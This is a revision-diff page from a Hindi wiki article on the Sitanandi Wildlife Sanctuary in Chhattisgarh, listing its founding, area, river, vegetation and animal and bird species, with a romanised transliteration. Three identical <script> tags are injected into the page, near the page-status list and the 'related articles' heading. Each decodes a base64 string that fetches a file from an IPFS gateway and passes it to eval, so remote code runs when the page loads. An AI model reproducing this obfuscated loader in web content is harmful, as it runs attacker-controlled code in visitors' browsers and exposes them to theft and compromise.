Difference between revisions of "सीतानंदी अभयारण्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
*[[छत्तीसगढ़]] के धमतरी ज़िले में स्थित सीतानंदी वन्‍य जीवन अभयारण्‍य मध्‍य [[भारत]] के सर्वाधिक प्रसिद्ध और महत्‍वपूर्ण वन्‍य जीवन अभयारण्‍य में से एक है।  
+
*[[छत्तीसगढ़]] के धमतरी ज़िले में स्थित सीतानंदी वन्‍य जीवन अभयारण्‍य मध्‍य [[भारत]] के सर्वाधिक प्रसिद्ध और महत्त्वपूर्ण वन्‍य जीवन अभयारण्‍य में से एक है।  
 
*सीतानंदी अभयारण्य की स्‍थापना वन्‍य जीवन संरक्षण अधिनियम 1972 के तहत 1974 में की गई थी, इस अभयारण्‍य में 556 वर्ग किलो मीटर के क्षेत्रफल में अत्‍यंत ऊंचे नीचे पहाड़ और पहाड़ी तराइयां हैं जिनकी ऊंचाई 327-736 मीटर के बीच है।  
 
*सीतानंदी अभयारण्य की स्‍थापना वन्‍य जीवन संरक्षण अधिनियम 1972 के तहत 1974 में की गई थी, इस अभयारण्‍य में 556 वर्ग किलो मीटर के क्षेत्रफल में अत्‍यंत ऊंचे नीचे पहाड़ और पहाड़ी तराइयां हैं जिनकी ऊंचाई 327-736 मीटर के बीच है।  
 
*यह सुंदर अभयारण्‍य सीतानंदी नदी के नाम पर बनाया गया है, जो इस अभयारण्‍य के बीच से बहती है और देव कूट के पास [[महानदी]] नामक नदी से जुड़ती है।  
 
*यह सुंदर अभयारण्‍य सीतानंदी नदी के नाम पर बनाया गया है, जो इस अभयारण्‍य के बीच से बहती है और देव कूट के पास [[महानदी]] नामक नदी से जुड़ती है।  
 
*सीतानंदी वन्‍य जीवन अभयारण्‍य अपने हरे भरे पेड़ पौधों और विशिष्‍ट तथा विविध जीव जंतुओं के कारण जाना जाता है और यहाँ मध्‍य भारत का एक उत्‍कृष्‍टतम वन्‍य जीवन बनने की क्षमता है।
 
*सीतानंदी वन्‍य जीवन अभयारण्‍य अपने हरे भरे पेड़ पौधों और विशिष्‍ट तथा विविध जीव जंतुओं के कारण जाना जाता है और यहाँ मध्‍य भारत का एक उत्‍कृष्‍टतम वन्‍य जीवन बनने की क्षमता है।
 
*सीतानंदी वन्‍य जीवन अभयारण्‍य की वनस्‍पति में मुख्‍यत: नम पेनिन सुलर साल, टीक और [[बांस]] के वन शामिल हैं।  
 
*सीतानंदी वन्‍य जीवन अभयारण्‍य की वनस्‍पति में मुख्‍यत: नम पेनिन सुलर साल, टीक और [[बांस]] के वन शामिल हैं।  
*सीतानंदी अभयारण्‍य के अन्‍य प्रमुख वृक्ष हैं सेमल, महुआ, हर्र, बेर, तेंदु। यहाँ की हरी भरी वनस्‍पति में अनेक प्रकार के वन्‍य जीवन के उदाहरण मिलते हैं।  
+
*सीतानंदी अभयारण्‍य के अन्‍य प्रमुख वृक्ष हैं- सेमल, महुआ, हर्र, बेर, तेंदु। यहाँ की हरी भरी वनस्‍पति में अनेक प्रकार के वन्‍य जीवन के उदाहरण मिलते हैं।  
 
*सीतानंदी में पाए जाने वाले प्रमुख वन्‍य जंतुओं में [[बाघ]], चीते, उड़ने वाली गिलहरी, [[भेडिया|भेडिए]], चार सींग वाले एंटीलॉप, चिंकारा, ब्‍लैक बक, जंगली बिल्‍ली, बार्किंग डीयर, साही, बंदर, बायसन, पट्टीदार हाइना, स्‍लॉथ बीयर, जंगली कुत्ते, [[चीतल]], सांभर, नील गाय, गौर, मुंट जैक, जंगली सुअर, कोबरा, [[अजगर]] आदि शामिल हैं।  
 
*सीतानंदी में पाए जाने वाले प्रमुख वन्‍य जंतुओं में [[बाघ]], चीते, उड़ने वाली गिलहरी, [[भेडिया|भेडिए]], चार सींग वाले एंटीलॉप, चिंकारा, ब्‍लैक बक, जंगली बिल्‍ली, बार्किंग डीयर, साही, बंदर, बायसन, पट्टीदार हाइना, स्‍लॉथ बीयर, जंगली कुत्ते, [[चीतल]], सांभर, नील गाय, गौर, मुंट जैक, जंगली सुअर, कोबरा, [[अजगर]] आदि शामिल हैं।  
 
*सीतानंदी अभयारण्‍य में अनेक प्रकार के पक्षी पाए जाते हैं इसमें से कुछ नाम हैं [[तोता|तोते]], बुलबुल, पी फाउल, फीसेंट, क्रीमसन बारबेट, तीतर, ट्रीपाइ, रैकिट टेल्‍ड ड्रोंगो, अगरेट तथा हेरॉन्‍स, सीतानंदी अभयारण्‍य को इस क्षेत्र में एक महत्‍वपूर्ण बाघ अभयारण्‍य के रूप में विकसित करने की तैयारी भी की जा रही है।  
 
*सीतानंदी अभयारण्‍य में अनेक प्रकार के पक्षी पाए जाते हैं इसमें से कुछ नाम हैं [[तोता|तोते]], बुलबुल, पी फाउल, फीसेंट, क्रीमसन बारबेट, तीतर, ट्रीपाइ, रैकिट टेल्‍ड ड्रोंगो, अगरेट तथा हेरॉन्‍स, सीतानंदी अभयारण्‍य को इस क्षेत्र में एक महत्‍वपूर्ण बाघ अभयारण्‍य के रूप में विकसित करने की तैयारी भी की जा रही है।  

Revision as of 06:14, 18 August 2011

  • chhattisagadh ke dhamatari zile mean sthit sitanandi vanh‍y jivan abhayaranh‍y madhh‍y bharat ke sarvadhik prasiddh aur mahattvapoorn vanh‍y jivan abhayaranh‍y mean se ek hai.
  • sitanandi abhayarany ki sh‍thapana vanh‍y jivan sanrakshan adhiniyam 1972 ke tahat 1974 mean ki gee thi, is abhayaranh‍y mean 556 varg kilo mitar ke kshetraphal mean ath‍yant ooanche niche paha d aur paha di taraiyaan haian jinaki ooanchaee 327-736 mitar ke bich hai.
  • yah suandar abhayaranh‍y sitanandi nadi ke nam par banaya gaya hai, jo is abhayaranh‍y ke bich se bahati hai aur dev koot ke pas mahanadi namak nadi se ju dati hai.
  • sitanandi vanh‍y jivan abhayaranh‍y apane hare bhare pe d paudhoan aur vishishh‍t tatha vividh jiv jantuoan ke karan jana jata hai aur yahaan madhh‍y bharat ka ek uth‍krishh‍tatam vanh‍y jivan banane ki kshamata hai.
  • sitanandi vanh‍y jivan abhayaranh‍y ki vanash‍pati mean mukhh‍yat: nam penin sular sal, tik aur baans ke van shamil haian.
  • sitanandi abhayaranh‍y ke anh‍y pramukh vriksh haian- semal, mahua, harr, ber, teandu. yahaan ki hari bhari vanash‍pati mean anek prakar ke vanh‍y jivan ke udaharan milate haian.
  • sitanandi mean pae jane vale pramukh vanh‍y jantuoan mean bagh, chite, u dane vali gilahari, bhedie, char siang vale eantil aaup, chiankara, bh‍laik bak, jangali bilh‍li, barkiang diyar, sahi, bandar, bayasan, pattidar haina, sh‍l aauth biyar, jangali kutte, chital, saanbhar, nil gay, gaur, muant jaik, jangali suar, kobara, ajagar adi shamil haian.
  • sitanandi abhayaranh‍y mean anek prakar ke pakshi pae jate haian isamean se kuchh nam haian tote, bulabul, pi phaul, phiseant, krimasan barabet, titar, tripai, raikit telh‍d droango, agaret tatha her aaunh‍s, sitanandi abhayaranh‍y ko is kshetr mean ek mahath‍vapoorn bagh abhayaranh‍y ke roop mean vikasit karane ki taiyari bhi ki ja rahi hai.
  • sitanandi abhayaranh‍y mean jane par paryatakoan ko sabhi prakar ke vanh‍y jivan ka ek manoranjak aur avish‍maraniy anubhav milata hai, khas taur par prakriti se prem karane valoan aur anh‍y jivan ke shaukin vh‍yaktiyoan ko.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>